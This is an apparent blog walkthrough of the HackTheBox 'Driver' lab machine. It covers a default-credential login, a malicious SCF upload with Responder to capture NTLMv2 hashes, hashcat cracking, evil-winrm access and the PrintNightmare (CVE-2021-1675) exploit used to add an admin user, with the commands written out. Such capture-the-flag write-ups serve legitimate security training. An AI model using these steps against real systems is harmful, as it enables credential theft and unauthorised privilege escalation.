In this post, I would like to share a walkthrough of the Driver Machine from HackTheBox
This room has been considered difficulty rated as an Easy machine on HackThebox
What will you gain from the Driver machine?
For the user flag, you will execute the SMB relay approach to obtain tony’s password
As for the root flag, you need to execute an exploit related to PrintNightMare
Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
Let’s try to access the website interface
We are required to key in the username and password to login to the Dashboard. My assumption of the credentials would be admin:admin
## Surely people are thinking about how I get the username admin? If you look carefully, there’s wording such as “Please enter a password for admin” ##
Finally, we managed to login into the Dashboard.
Gaining the Privileges Access
On the menu bar, there’s nothing that can be used except the Firmware Updates function which leads to a page that requires us to update the printer’s firmware.
From the result, I notice there’s a lot of Metasploit methods which I try to avoid using it. However, we managed to sight a website that guide us to exploit the machine without using Metasploit.
As a result, we will need to create a file under the SCF format that is shown in the screenshot above.
The only modification needed would be \\<Your IP Address>\share\<anyname>.ico
Let’s run the tools Responder by using “sudo responder -wrf –lm -v -I tun0” which the tool stops at “Listening for the event“
Once the responder has been started, we can finally attach the SCF file format to the website and click “Submit“
After a while, we have been provided with a lot of NTLMv2 hash which only assigned to tony
Let’s save the first hashes into a file and try to obtain the password from it using hashcat command such as “hashcat -m 5600 -a o <hash file> /<your file location that stored the rockyou>/rockyou.txt“
Finally, we have the password for tony which liltony.
Let’s try to login the machine via an evil-winrm tool which requires the command like evil-winrm -i 10.10.11.106 -u tony -p liltony
We can read the user flag by executing the command “type C:\Users\tony\Desktop\user.txt“
Escalate to Admin Privileges on Driver Machine
At last, I can test the PrintNightMare Vulnerability on HTB Machine.
For those who are not familiar with the PrintNightMare exploit, you can google it on the internet.
Firstly, you need to download the PrintNightMare exploit by running the command “git clone https://github.com/calebstewart/CVE-2021-1675” on your own machine.
After that, we can upload the CVE-2021-1675.ps1 into the HTB’s machine.
Next, we can use the command “Import-Module .\CVE-2021-1675.ps1“
Finally, we can create a new username and password by using the Invoke-Nightmare -NewUser “anything” -NewPassword “anything”
As a result, we can login the machine using the credentials that we created earlier.
We should be able to obtain the root flag by executing “type C:\Users\administrator\Desktop\root.txt“
In case we found an error when trying to import the module of the ps1 file on the HTB’s machine, we can try to download the file into the machine using the IEX command shown below: